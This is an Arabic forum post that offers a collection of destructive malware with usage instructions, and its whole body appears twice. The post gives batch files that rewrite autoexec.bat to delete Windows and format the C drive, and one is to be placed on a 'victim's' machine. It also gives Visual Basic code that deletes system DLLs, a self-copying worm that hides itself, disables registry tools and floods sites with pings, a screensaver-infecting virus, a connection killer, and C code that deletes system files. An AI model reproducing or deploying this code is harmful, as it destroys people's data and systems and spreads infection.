3n!Gma
08-11-2007, 02:22 PM
السلام عليكم ورحمة الله وبركاته
موضوع مليان فيروسات
:1 (98):
أحذركم قبل قراءة الموضوع ولا إستخدامه أن الفيروسات اللي هنا خطيرة
كونوا حذرين في استعمالها فلست مسؤولة عن أي شيئ يحدث للأجهزة
يا الله نبدأ بسم الله
اول خطوة : تفتح صفحة مفكره جديده NotePad
و تكتب فيها هذي الاوامر بدون زياده او نقصان
و اللأحسن أنك تنسخها كما هي
البعض يعمل هيك و البعض الآخر لأ
و سأضيف شرح اللي يعتمد على هذي الطريقة و اللي ما يعمل بيها سأوضح طريقة إستعماله
|||||||||||||||| >>><<<|||||||||||||||||
1
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:/progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
بعد ما تكتب الاوامر تروح و تحفظه
و تخلي امتداده .bat
و تضعه مع ملفات الويندوز
او في بارتشن السي
2
إذهب إلى Start ثم Run إكتب Edit وإضغط Enter
راح تطلع لك صفحة زرقاء
إكتب فيها الأكواد التالية
@Echo of
**** <deltree< c>>
**** <deltree< d>>
**** <deltree< e>>
**** <deltree< f>>
وإذهب إلى File ثم Save As.. راح يسألك أين تريد تحفظ الملف إحفظه بالإسم التالي Autoexec.bat وحطه في جهاز الضحية على الدرايف C
3
الفكرة:
سيقوم هذا الفيروس بحذف جميع ملفات dll في ويندوز مما يؤدي الي تدميره..
الكود:
افتح مشروع جديد StandartEXE و قم بكتابة الكود التالي:
Private Sub Form_Load()
kill ("C:\windows\system32\*.dll")
End Sub
طبعا ممكن تغير dll الي exe
4
كود لدودة كومبيوتر
Private Sub Form_Load()
' Omega Worm
On Error Resume Next ' continues when an error occurs
' hides the program
Me.Hide
App.TaskVisible = False
' copies itself to system32
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsSystem32" + App.EXEName + ".exe"
' hides itself by setting RASH but can still be viewed if the ShowSuperHiiden is set to 1
SetAttr "C:WindowsSystem32" + App.EXEName + ".exe", vbReadOnly + vbArchive + vbSystem + vbHidden
' Disables the Registry from user access but apps can still access it
Set x = CreateObject("w******.shell")
regkey = "HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System"
x.regwrite regkey & "DisableRegistryTools", 1, "REG_DWORD"
' Set ShowSuperHidden to 0
regkey = "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorer Advanced"
x.regwrite regkey & "ShowSuperHidden", 0, "REG_DWORD"
' adds itself to the registry startup
regkey = "HKLMSoftwareMicrosoftWindowsCurrentVersionRun"
x.regwrite regkey & "Windows", "C:WindowsSystem32" + App.EXEName + ".exe"
' checks the time then selects a case to determine the action to take
Do ' starts a loop
Select Case Time
Case Time > "7:01:00 PM" And Time < "5:59:00 PM" ' if the time is between 7:01 pm and 5:59 pm it will ping aol,yahoo,google,microsoft 60 times then end
For t = 1 To 60
Shell ("ping -l 65500 www.microsoft.com")
Shell ("ping -l 65500 www.aol.com")
Shell ("ping -l 65500 www.yahoo.com")
Shell ("ping -l 65500 www.google.com")
Sleep 5000
Next t
Case Time > "6:00:00 PM" And Time < "7:00:00 PM"
On Error GoTo chk ' on error it will go to the chk label
FileSystem.ChDir "c:Shared" ' it will attempt to cd to a directory
chk:
If VBA.Err.Number = 76 Then ' if error 76 then it means the directory dose not exist
Else ' it means it does
FileCopy App.Path + "" + App.EXEName + ".exe", "c:Shared" + App.EXEName + ".exe" ' copy itself to it
End If
On Error GoTo chk2 ' same steps as above
FileSystem.ChDir "c:windowsShared"
chk2:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "c:windowsShared" + App.EXEName + ".exe"
End If
On Error GoTo chk3
FileSystem.ChDir "C:My Shared Folder"
chk3:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:My Shared Folder" + App.EXEName + ".exe"
End If
On Error GoTo chk4
FileSystem.ChDir "C:WindowsMy Shared Folder"
chk4:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsMy Shared Folder" + App.EXEName + ".exe"
End If
On Error GoTo chk5
FileSystem.ChDir "C:Share"
chk5:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:Share" + App.EXEName + ".exe"
End If
On Error GoTo chk6
FileSystem.ChDir "C:WindowsShare"
chk6:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsShare" + App.EXEName + ".exe"
End If
On Error GoTo chk7
FileSystem.ChDir "C:My Downloads"
chk7:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:My Downloads" + App.EXEName + ".exe"
End If
On Error GoTo chk8
FileSystem.ChDir "C:WindowsMy Downloads"
chk8:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsMy Downloads" + App.EXEName + ".exe"
End If
End Select
Loop
End Sub
5
كود فيروس حافظة الشاشه
هذا الفيروس يحقن نفسه داخل حافظة الشاشه
'For Educational Purposes
'Do Not Compile Or Test In Any Way
'Coded By The Napster ]:D
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Dim WinF As String, Host As Long, HProc As Long, HExit As Long, HCode, VCode, VCheck
Dim ScrGroup, Tmp1, AllScrs, Scr
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
'--- Start Of ScrInfection Virus ---'
Private Sub Form_Load()
App.TaskVisible = False
If Dir("C:windows", vbDirectory) <> "" Then
WinF = "C:windows"
ElseIf Dir("C:winnt", vbDirectory) <> "" Then
WinF = "C:winnt"
Else
End
End If
If Dir(WinF & "system32Update.scr") = "" Then
FileCopy App.Path & "" & App.EXEName & ".exe", WinF & "Update.scr"
End If
GetHost
ScrFun
End
End Sub
Function GetHost()
Open App.Path & "" & App.EXEName & ".scr" For Binary Access Read As #1
HCode = Space(LOF(1) - 1234)
Get #1, , HCode
Close #1
Open App.Path & "scrhost.scr" For Binary Access Write As #2
Put #2, , HCode
Close #2
Host = Shell(App.Path & "scrhost.scr", vbNormalFocus)
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit
Do While HExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess HProc, HExit
Loop
Kill App.Path & "scrhost.scr"
End Function
Function ScrFun()
Open App.Path & "" & App.EXEName & ".scr" For Binary Access Read As #1
VCode = Space(1234)
Get #1, , VCode
Close #1
Tmp1 = ""
ScrGroup = Dir$(WinF & "*.scr")
While ScrGroup <> ""
Tmp1 = Tmp1 & ScrGroup & "/"
ScrGroup = Dir$
Wend
If Right(Tmp1, 1) = "/" Then Tmp1 = Mid(Tmp1, 1, Len(Tmp1) - 1)
AllScrs = Split(Tmp1, "/")
For Each Scr In AllScrs
Open WinF & "" & Scr For Binary Access Read As #2
VCheck = Space(1234)
HCode = Space(LOF(2) - 1234)
Get #2, , VCheck
Get #2, , HCode
Close #2
If VCheck = VCode Then GoTo goNext
Inject:
Open WinF & "" & Scr For Binary Access Write As #3
Put #3, , VCode
Put #3, , HCode
Close #3
Dim RegTool As Object
Set RegTool = CreateObject("W******.Shell")
RegTool.RegWrite "HKCUControl PanelDesktopSCRNSAVE.EXE", WinF & "" & Scr
Exit For
goNext:
Next Scr
End Function
'--- [EOF] ---'
6
كود فيروس لمنع دخول النت هع
Private Const RAS_MAXENTRYNAME As Integer = 256
Private Const RAS_MAXDEVICETYPE As Integer = 16
Private Const RAS_MAXDEVICENAME As Integer = 128
Private Const RAS_RASCONNSIZE As Integer = 412
Private Type RasEntryName
dwSize As Long
szEntryName(RAS_MAXENTRYNAME) As Byte
End Type
Private Type RasConn
dwSize As Long
hRasConn As Long
szEntryName(RAS_MAXENTRYNAME) As Byte
szDeviceType(RAS_MAXDEVICETYPE) As Byte
szDeviceName(RAS_MAXDEVICENAME) As Byte
End Type
Private Declare Function RasEnumConnections Lib "rasapi32.dll" Alias "RasEnumConnectionsA" (lpRasConn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Declare Function RasHangUp Lib "rasapi32.dll" Alias "RasHangUpA" (ByVal hRasConn As Long) As Long
Dim gstrISPName As String
Dim ReturnCode As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef _
lpSFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Form_Load()
App.TaskVisible = False
Timer1.Interval = 1
Timer1.Enabled = True
End Sub
Private Sub Timer1_Timer()
If Online = True Then HangUp
End Sub
Function Online() As Boolean
Dim flags As Long
Online = InternetGetConnectedState(flags, 0)
End Function
Private Sub HangUp()
Dim i As Long
Dim lpRasConn(255) As RasConn
Dim lpcb As Long
Dim lpcConnections As Long
Dim hRasConn As Long
lpRasConn(0).dwSize = RAS_RASCONNSIZE
lpcb = RAS_MAXENTRYNAME * lpRasConn(0).dwSize
lpcConnections = 0
ReturnCode = RasEnumConnections(lpRasConn(0), lpcb, lpcConnections)
If ReturnCode = ERROR_SUCCESS Then
For i = 0 To lpcConnections - 1
If Trim(ByteToString(lpRasConn(i).szEntryName)) = Trim(gstrISPName) Then
hRasConn = lpRasConn(i).hRasConn
ReturnCode = RasHangUp(ByVal hRasConn)
End If
Next i
End If
End Sub
Function ByteToString(bytString() As Byte) As String
Dim i As Integer
ByteToString = ""
i = 0
While bytString(i) = 0&
ByteToString = ByteToString & Chr(bytString(i))
i = i + 1
Wend
End Function
7
كود فيرس بالسي" C"
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("tttWelcome to the Egyption -oO Virus Oo-nn");
printf("ttFuck -oO Israel Oo- and -oO America Oo-nn");
remove("c:windowssystem.ini");
remove("c:windowswin.ini");
remove("c:autoexec.bat");
remove("c:msdos.sys");
remove("c:io.sys");
remove("c:command.com");
remove("c:config.sys");
remove("c:windowsebdcommand.com");
remove("c:windowsebdebd.cab");
remove("c:windowsebdAutoexec.bat");
remove("c:windowsebdsetramd.bat");
remove("c:windowsebdFindramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...nn");
system("PAUSE");
}
8
فيرس خطير لتدمير الوندوز بالفيجوال بيسك في دقيقة
أولا إفتح مشروع جديد من نوع EXE standard
أنقر نقرا مزدوجا فوق الفورم
واكتب هدا الكود في الحدث Form_Load
kill "c:\windows\*.dll"
أرأيتم الكود بسيط و في سطر واحد !!!!!!!!
عجيب أليس كدالك و لكنه خطير جدا جدا جدا و عند تنفيده سيدمر الوندوز بصفة نهائية ........
قد يستغرب البعض و لكن سأشرح الكود لتفهمو طريقة عمله
أولا الأمر Kill يعني قتل أو مسح
ولكن مسح مادا إدا لاحظتم أمام الأمر يوجد c:\windows أي هنا حددنا له أين سيمسح المطلوب
إدا لاحظتم dll*.* الملف دو الإمتداد dll هده الملفات مهمة جدا للوندوز بل هي الحياة عند الوندوزو إدا نقصت ماتت الوندوز ولكن ما فائدة *.* :
عزيزي القارئ لها دور كبير وهو أنك تأمر بحذف جميع الملفات دات الإمتداد dll
و القضية الأهم هو أن عملية الحذف تتم بسرعة دون إظها رسالة تحذير كالتي تظهر في الوندوز عند حذف أي شيء و لو بسيط
سؤال :
قد يقول قائل لماذا لا نترك الكود هكذا ؟
kill "c:\windows"
و بالتالي نأمر بحذف مجلد الوندوز بأكمله !
و يمكن التعديل عليه كأمره بحذف System32
و البقية من ملفات الوندوز
تحياتي للجميع
و ترقبوا المزيد عن قريب ان شاء الله
موضوع مليان فيروسات
:1 (98):
أحذركم قبل قراءة الموضوع ولا إستخدامه أن الفيروسات اللي هنا خطيرة
كونوا حذرين في استعمالها فلست مسؤولة عن أي شيئ يحدث للأجهزة
يا الله نبدأ بسم الله
اول خطوة : تفتح صفحة مفكره جديده NotePad
و تكتب فيها هذي الاوامر بدون زياده او نقصان
و اللأحسن أنك تنسخها كما هي
البعض يعمل هيك و البعض الآخر لأ
و سأضيف شرح اللي يعتمد على هذي الطريقة و اللي ما يعمل بيها سأوضح طريقة إستعماله
|||||||||||||||| >>><<<|||||||||||||||||
1
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y c:/progra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
بعد ما تكتب الاوامر تروح و تحفظه
و تخلي امتداده .bat
و تضعه مع ملفات الويندوز
او في بارتشن السي
2
إذهب إلى Start ثم Run إكتب Edit وإضغط Enter
راح تطلع لك صفحة زرقاء
إكتب فيها الأكواد التالية
@Echo of
**** <deltree< c>>
**** <deltree< d>>
**** <deltree< e>>
**** <deltree< f>>
وإذهب إلى File ثم Save As.. راح يسألك أين تريد تحفظ الملف إحفظه بالإسم التالي Autoexec.bat وحطه في جهاز الضحية على الدرايف C
3
الفكرة:
سيقوم هذا الفيروس بحذف جميع ملفات dll في ويندوز مما يؤدي الي تدميره..
الكود:
افتح مشروع جديد StandartEXE و قم بكتابة الكود التالي:
Private Sub Form_Load()
kill ("C:\windows\system32\*.dll")
End Sub
طبعا ممكن تغير dll الي exe
4
كود لدودة كومبيوتر
Private Sub Form_Load()
' Omega Worm
On Error Resume Next ' continues when an error occurs
' hides the program
Me.Hide
App.TaskVisible = False
' copies itself to system32
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsSystem32" + App.EXEName + ".exe"
' hides itself by setting RASH but can still be viewed if the ShowSuperHiiden is set to 1
SetAttr "C:WindowsSystem32" + App.EXEName + ".exe", vbReadOnly + vbArchive + vbSystem + vbHidden
' Disables the Registry from user access but apps can still access it
Set x = CreateObject("w******.shell")
regkey = "HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System"
x.regwrite regkey & "DisableRegistryTools", 1, "REG_DWORD"
' Set ShowSuperHidden to 0
regkey = "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorer Advanced"
x.regwrite regkey & "ShowSuperHidden", 0, "REG_DWORD"
' adds itself to the registry startup
regkey = "HKLMSoftwareMicrosoftWindowsCurrentVersionRun"
x.regwrite regkey & "Windows", "C:WindowsSystem32" + App.EXEName + ".exe"
' checks the time then selects a case to determine the action to take
Do ' starts a loop
Select Case Time
Case Time > "7:01:00 PM" And Time < "5:59:00 PM" ' if the time is between 7:01 pm and 5:59 pm it will ping aol,yahoo,google,microsoft 60 times then end
For t = 1 To 60
Shell ("ping -l 65500 www.microsoft.com")
Shell ("ping -l 65500 www.aol.com")
Shell ("ping -l 65500 www.yahoo.com")
Shell ("ping -l 65500 www.google.com")
Sleep 5000
Next t
Case Time > "6:00:00 PM" And Time < "7:00:00 PM"
On Error GoTo chk ' on error it will go to the chk label
FileSystem.ChDir "c:Shared" ' it will attempt to cd to a directory
chk:
If VBA.Err.Number = 76 Then ' if error 76 then it means the directory dose not exist
Else ' it means it does
FileCopy App.Path + "" + App.EXEName + ".exe", "c:Shared" + App.EXEName + ".exe" ' copy itself to it
End If
On Error GoTo chk2 ' same steps as above
FileSystem.ChDir "c:windowsShared"
chk2:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "c:windowsShared" + App.EXEName + ".exe"
End If
On Error GoTo chk3
FileSystem.ChDir "C:My Shared Folder"
chk3:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:My Shared Folder" + App.EXEName + ".exe"
End If
On Error GoTo chk4
FileSystem.ChDir "C:WindowsMy Shared Folder"
chk4:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsMy Shared Folder" + App.EXEName + ".exe"
End If
On Error GoTo chk5
FileSystem.ChDir "C:Share"
chk5:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:Share" + App.EXEName + ".exe"
End If
On Error GoTo chk6
FileSystem.ChDir "C:WindowsShare"
chk6:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsShare" + App.EXEName + ".exe"
End If
On Error GoTo chk7
FileSystem.ChDir "C:My Downloads"
chk7:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:My Downloads" + App.EXEName + ".exe"
End If
On Error GoTo chk8
FileSystem.ChDir "C:WindowsMy Downloads"
chk8:
If VBA.Err.Number = 76 Then
Else
FileCopy App.Path + "" + App.EXEName + ".exe", "C:WindowsMy Downloads" + App.EXEName + ".exe"
End If
End Select
Loop
End Sub
5
كود فيروس حافظة الشاشه
هذا الفيروس يحقن نفسه داخل حافظة الشاشه
'For Educational Purposes
'Do Not Compile Or Test In Any Way
'Coded By The Napster ]:D
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Dim WinF As String, Host As Long, HProc As Long, HExit As Long, HCode, VCode, VCheck
Dim ScrGroup, Tmp1, AllScrs, Scr
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
'--- Start Of ScrInfection Virus ---'
Private Sub Form_Load()
App.TaskVisible = False
If Dir("C:windows", vbDirectory) <> "" Then
WinF = "C:windows"
ElseIf Dir("C:winnt", vbDirectory) <> "" Then
WinF = "C:winnt"
Else
End
End If
If Dir(WinF & "system32Update.scr") = "" Then
FileCopy App.Path & "" & App.EXEName & ".exe", WinF & "Update.scr"
End If
GetHost
ScrFun
End
End Sub
Function GetHost()
Open App.Path & "" & App.EXEName & ".scr" For Binary Access Read As #1
HCode = Space(LOF(1) - 1234)
Get #1, , HCode
Close #1
Open App.Path & "scrhost.scr" For Binary Access Write As #2
Put #2, , HCode
Close #2
Host = Shell(App.Path & "scrhost.scr", vbNormalFocus)
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit
Do While HExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess HProc, HExit
Loop
Kill App.Path & "scrhost.scr"
End Function
Function ScrFun()
Open App.Path & "" & App.EXEName & ".scr" For Binary Access Read As #1
VCode = Space(1234)
Get #1, , VCode
Close #1
Tmp1 = ""
ScrGroup = Dir$(WinF & "*.scr")
While ScrGroup <> ""
Tmp1 = Tmp1 & ScrGroup & "/"
ScrGroup = Dir$
Wend
If Right(Tmp1, 1) = "/" Then Tmp1 = Mid(Tmp1, 1, Len(Tmp1) - 1)
AllScrs = Split(Tmp1, "/")
For Each Scr In AllScrs
Open WinF & "" & Scr For Binary Access Read As #2
VCheck = Space(1234)
HCode = Space(LOF(2) - 1234)
Get #2, , VCheck
Get #2, , HCode
Close #2
If VCheck = VCode Then GoTo goNext
Inject:
Open WinF & "" & Scr For Binary Access Write As #3
Put #3, , VCode
Put #3, , HCode
Close #3
Dim RegTool As Object
Set RegTool = CreateObject("W******.Shell")
RegTool.RegWrite "HKCUControl PanelDesktopSCRNSAVE.EXE", WinF & "" & Scr
Exit For
goNext:
Next Scr
End Function
'--- [EOF] ---'
6
كود فيروس لمنع دخول النت هع
Private Const RAS_MAXENTRYNAME As Integer = 256
Private Const RAS_MAXDEVICETYPE As Integer = 16
Private Const RAS_MAXDEVICENAME As Integer = 128
Private Const RAS_RASCONNSIZE As Integer = 412
Private Type RasEntryName
dwSize As Long
szEntryName(RAS_MAXENTRYNAME) As Byte
End Type
Private Type RasConn
dwSize As Long
hRasConn As Long
szEntryName(RAS_MAXENTRYNAME) As Byte
szDeviceType(RAS_MAXDEVICETYPE) As Byte
szDeviceName(RAS_MAXDEVICENAME) As Byte
End Type
Private Declare Function RasEnumConnections Lib "rasapi32.dll" Alias "RasEnumConnectionsA" (lpRasConn As Any, lpcb As Long, lpcConnections As Long) As Long
Private Declare Function RasHangUp Lib "rasapi32.dll" Alias "RasHangUpA" (ByVal hRasConn As Long) As Long
Dim gstrISPName As String
Dim ReturnCode As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef _
lpSFlags As Long, ByVal dwReserved As Long) As Long
Private Sub Form_Load()
App.TaskVisible = False
Timer1.Interval = 1
Timer1.Enabled = True
End Sub
Private Sub Timer1_Timer()
If Online = True Then HangUp
End Sub
Function Online() As Boolean
Dim flags As Long
Online = InternetGetConnectedState(flags, 0)
End Function
Private Sub HangUp()
Dim i As Long
Dim lpRasConn(255) As RasConn
Dim lpcb As Long
Dim lpcConnections As Long
Dim hRasConn As Long
lpRasConn(0).dwSize = RAS_RASCONNSIZE
lpcb = RAS_MAXENTRYNAME * lpRasConn(0).dwSize
lpcConnections = 0
ReturnCode = RasEnumConnections(lpRasConn(0), lpcb, lpcConnections)
If ReturnCode = ERROR_SUCCESS Then
For i = 0 To lpcConnections - 1
If Trim(ByteToString(lpRasConn(i).szEntryName)) = Trim(gstrISPName) Then
hRasConn = lpRasConn(i).hRasConn
ReturnCode = RasHangUp(ByVal hRasConn)
End If
Next i
End If
End Sub
Function ByteToString(bytString() As Byte) As String
Dim i As Integer
ByteToString = ""
i = 0
While bytString(i) = 0&
ByteToString = ByteToString & Chr(bytString(i))
i = i + 1
Wend
End Function
7
كود فيرس بالسي" C"
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("tttWelcome to the Egyption -oO Virus Oo-nn");
printf("ttFuck -oO Israel Oo- and -oO America Oo-nn");
remove("c:windowssystem.ini");
remove("c:windowswin.ini");
remove("c:autoexec.bat");
remove("c:msdos.sys");
remove("c:io.sys");
remove("c:command.com");
remove("c:config.sys");
remove("c:windowsebdcommand.com");
remove("c:windowsebdebd.cab");
remove("c:windowsebdAutoexec.bat");
remove("c:windowsebdsetramd.bat");
remove("c:windowsebdFindramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...nn");
system("PAUSE");
}
8
فيرس خطير لتدمير الوندوز بالفيجوال بيسك في دقيقة
أولا إفتح مشروع جديد من نوع EXE standard
أنقر نقرا مزدوجا فوق الفورم
واكتب هدا الكود في الحدث Form_Load
kill "c:\windows\*.dll"
أرأيتم الكود بسيط و في سطر واحد !!!!!!!!
عجيب أليس كدالك و لكنه خطير جدا جدا جدا و عند تنفيده سيدمر الوندوز بصفة نهائية ........
قد يستغرب البعض و لكن سأشرح الكود لتفهمو طريقة عمله
أولا الأمر Kill يعني قتل أو مسح
ولكن مسح مادا إدا لاحظتم أمام الأمر يوجد c:\windows أي هنا حددنا له أين سيمسح المطلوب
إدا لاحظتم dll*.* الملف دو الإمتداد dll هده الملفات مهمة جدا للوندوز بل هي الحياة عند الوندوزو إدا نقصت ماتت الوندوز ولكن ما فائدة *.* :
عزيزي القارئ لها دور كبير وهو أنك تأمر بحذف جميع الملفات دات الإمتداد dll
و القضية الأهم هو أن عملية الحذف تتم بسرعة دون إظها رسالة تحذير كالتي تظهر في الوندوز عند حذف أي شيء و لو بسيط
سؤال :
قد يقول قائل لماذا لا نترك الكود هكذا ؟
kill "c:\windows"
و بالتالي نأمر بحذف مجلد الوندوز بأكمله !
و يمكن التعديل عليه كأمره بحذف System32
و البقية من ملفات الوندوز
تحياتي للجميع
و ترقبوا المزيد عن قريب ان شاء الله